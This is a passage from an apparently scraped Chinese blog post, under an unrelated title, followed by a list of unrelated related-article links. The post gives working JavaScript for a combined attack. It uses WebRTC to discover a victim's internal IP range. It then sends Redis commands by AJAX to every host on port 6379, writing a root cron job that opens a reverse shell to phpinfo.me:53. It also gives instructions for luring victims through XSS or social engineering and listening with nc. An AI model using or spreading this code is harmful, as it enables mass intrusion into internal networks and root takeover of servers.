lcy mysql爆破_Lcy’s Blog
利用xss或者社工让对方点我的链接,然后利用js自动化攻击内网redis,
利用redis写任务计划批量反弹shell。
js扫内网6379不太好实现,就不进行端口探测了,直接对整个网段执行一遍exp
利用如下代码获取内网ip段:
Document
ipList = []
var webrtcxss = {
webrtc : function(callback){
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = undefined;
if(window.webkitRTCPeerConnection){
servers = {iceServers: []};
}
var pc = new RTCPeerConnection(servers, mediaConstraints);
pc.onicecandidate = function(ice){
if(ice.candidate){
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){});
});
},
getIp : function(){
this.webrtc(function(ip){
ipList.push(ip);
});
}
}
webrtcxss.getIp()
setTimeout(function() {
alert(ipList)
}, 300)
效果如下图
利用ajax攻击redis原理:
参考文章:http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/
https://www.t00ls.net/thread-34873-1-1.html
http://www.freebuf.com/articles/web/19622.html
下面是一个ajax操作redis写任务计划反弹的例子:var ip = '192.168.203.2';
var port= '6379';
var dir = '/var/spool/cron/';
var filename = 'root';
var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1';
var url = "http://" + ip + ":" + port;
var cmd = new XMLHttpRequest();
cmd.open("POST", url);
cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n");
var cmd = new XMLHttpRequest();
cmd.open("POST", url);
cmd.send('save\r\n');
最后来实现自动获取内网ip,自动批量攻击内网1-255的ip
Document
ipList = []
var webrtcxss = {
webrtc : function(callback){
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = undefined;
if(window.webkitRTCPeerConnection){
servers = {iceServers: []};
}
var pc = new RTCPeerConnection(servers, mediaConstraints);
pc.onicecandidate = function(ice){
if(ice.candidate){
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){});
});
},
getIp : function(){
this.webrtc(function(ip){
ipList.push(ip);
});
}
}
webrtcxss.getIp()
setTimeout(function() {
for(var i in ipList) {
if(ipList[i]) {
var iparr = ipList[i].split(".");
for(var i=0;i<255;i++) {
var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i;
send(attkip);
}
}
}
}, 300);
function send(ip) {
var port= '6379';
var dir = '/var/spool/cron/';
var filename = 'root';
var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1';
var url = "http://" + ip + ":" + port;
var cmd = new XMLHttpRequest();
cmd.open("POST", url);
cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n");
var cmd = new XMLHttpRequest();
cmd.open("POST", url);
cmd.send('save\r\n');
}
如果嫌1-255不够可以再加一个for循环
自动向内网redis发送攻击代码
然后在自己的服务器中用nc监听你设置的端口,然后你会发现服务器已经躺在这了
测试模块已加入xss平台:http://xss.phpinfo.me/
lcy mysql爆破_Lcy’s Blog相关推荐
- lcy mysql爆破_mysql
mysql下载网址:https://downloads.mysql.com/archives/community/ Win10安装MySQL5.7 一.下载MySQL5.7 1.进入官方下载地址:ht ...
- Mysql报错Table ‘blog.user‘ doesn‘t exist
今天在阿里云部署springboot项目的时候发现的小错误,在低版本Mysql中不会报错,但是阿里云Mysql版本较高,出现了该错误错误代码: 1146 Table 'blog.USER' doesn ...
- nmap mysql爆破_关于Nmap的简单爆破
首先我们来对目标系统进行一次简单的扫描,.以确定其开放的服务有哪些: nmap 192.168.30.128 可以看到,目标服务器开放了众多的服务端口! 下面我们来对其 SMB 服务进行一个简单爆破: ...
- hydra mysql 爆破_Hydra(爆破神器)使用方法
文本框 textarea 动态显示行数(简单文本编辑器) 工作需求做一个文本编辑器简单的. 右边输入文字,左边会显示相应的代码行.清空也会变为1. 废话不多说上代码,自己理解. python中set使 ...
- 安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例
文章目录 一.前言 二.服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 ...
- MySQL口令扫描渗透测试攻略
对于MySQL数据库渗透来说,获取其口令至关重要,一般来讲数据库不会提供对外连接,安全严格的将会限制固有IP和本机登录数据库,但渗透就是发现各种例外!抱着研究的目地,将目前市面上主流的7款MySQL口 ...
- SQLALchemy之Python连接MySQL
20220225 https://www.cnblogs.com/toheart/p/9802990.html pymssql连接sqlserver https://blog.csdn.net/qq_ ...
- Java调用mysql的存储过程
在之前写过一篇博客是如何mysql如何创建存储过程,在这一节中,我们是在原来的基础上来进一步的学习,如何在Java程序中使用Java代码来调用mysql存储过程. mysql创建存储过程:http:/ ...
- mysql用户的创建和授权_MySQL用户创建和授权
环境 MySQL 5.1 + 命令行工具 问题 MySQL用户创建和授权 解决 1.以root用户登录创建新用户 C:\Users\Wentasy>mysql -uroot -p mysql&g ...
最新文章
- 查询整个数据库中某个特定值所在的表和字段的方法
- java数据访问策略_java – 支持基于最近访问过的项目的高效启动策略的数据结构...
- 【CSS3】table的css属性
- 【Android先进】查看手机记忆库状态和应用方法
- 使用高级程序设计语言实现集合的交并差运算
- Galaxy s4怎么安装一个预装软件的签名不一致的新版本
- php fpm 安装配置,php php+fpm安装配置
- JAVA爬取亚马逊的商品信息
- case when 效率高不高_扬州效率高的拍摄抖音短视频平台
- python结束线程类_Python线程指南(转)
- Halcon学习路线——模板匹配和仿射变换
- Java设计模式应用——工厂模式
- Java 数据类型及转换
- lm317扩流电路 (全集)
- matlab小波变换函数总结,matlab小波变换函数的总结与程序
- canvas设计抽奖刮刮卡(非酋慎点) - Kaiqisan
- Java人脸识别相册分类按时间分类相册按城市分类相册app源码
- git配置忽略某个文件提交
- 滚动计划方法、WBS方法、网络计划方法:理解三种计划方法并比较优缺点
- 欧拉角、轴角与四元数
热门文章
- 【2010】asp.net GridView分页的实现
- 阿尔伯塔大学知名计算机工程学教授,关于加拿大阿尔伯塔大学电气与计算机工程学院教授来我校作学术报告的通知...
- 微课--搭建单机版PySpark开发环境(8分钟)
- 1000道Python题库系列分享25(40道Pandas客观题)
- python选股源代码_【一点资讯】Python实现行业轮动量化选股【附完整源码】 www.yidianzixun.com...
- python模块是一个可共享的程序_python基础-模块
- idea mybaits逆向工程_IDEA 中集成 MyBatis Generator 组件逆向生成工程
- python相同key合并value_python 合并字典,相同 key 的 value 如何相加?
- logistic回归分析优点_逻辑回归的简单介绍
- C++基础与深度解析第六章:函数